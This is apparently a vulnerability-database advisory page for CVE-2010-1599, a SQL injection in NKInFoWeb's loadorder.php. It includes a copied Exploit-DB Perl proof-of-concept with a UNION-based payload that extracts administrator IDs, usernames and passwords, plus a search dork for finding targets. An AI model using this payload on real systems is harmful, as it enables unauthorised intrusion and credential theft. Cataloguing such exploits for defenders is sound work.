CVE-2010-1599

high
Published 2010-04-29 ยท Modified 2026-04-29
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
8.5

Description

SQL injection vulnerability in loadorder.php in NKInFoWeb 2.5 and 5.2.2.0 allows remote attackers to execute arbitrary SQL commands via the id_sp parameter.

Predictions

Exploit likelihood
20%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-12354 webapps php text ยท 1 KB
d4rk-h4ck3r ยท 2010-04-23

NKINFOWEB - SQL Injection

text exploit Source: Exploit-DB
# Software Link: http://jaist.dl.sourceforge.net/project/nkinfoweb/FunctionNkinfoweb_v.species.rar
# Tested on: several linux versions

#=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

 

#!/usr/bin/perl
 use strict;
 use LWP::Simple;

print "\n";  
print "##############################################################\n";  
print "# NKINFOWEB SQL INJECTION EXPLOIT                            #\n";  
print "# Author: d4rk-h4ck3r  (Tunisian Security Team)              #\n";  
print "# Greetz to Passeword & Maxilog & all vbspiders members      #\n"; 
print "# Dork: Powered by NKINFOWEB VSp ยฉ 2009                      #\n";
print "##############################################################\n";  

 my $domain = shift @ARGV or banner();
 my $injsql ="/loadorder.php?id_sp=-17+union+select+1,2,3,concat(0x3a3a3a,id_usersys,0x3a,usersys,0x3a,pwdsys,0x3a3a3a),5,6,7,8,9,10,11+from+usersys--";

 if(get($domain.$injsql) =~ /:::(.+):(.+):(.+):::/)
 {
   print "\n[+] Exploit Succesfull!";
   print "\n[+] Admin id: : $1";  
   print "\n[+] Admin username: $2";  
   print "\n[+] Admin password: $3";
   print "\n[+] Admin panel: $domain/administrator/ ";}
 else
 {
   print "[!] Exploit Failed!\n";
   print "[!] Site Not Vulnerable!\n";
 }

 sub banner
 {
   print "[+] NKINFOWEB <= Remote SQL Injection Exploit\n";
   print "[+] Usage: ${0} http://[host]\n";
   return exit;
 }

Application impact

VendorProductVersionsFixed
nkinfowebnkinfoweb2.5
nkinfowebnkinfoweb5.2.2.0

References

CWEs

CWE-89

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.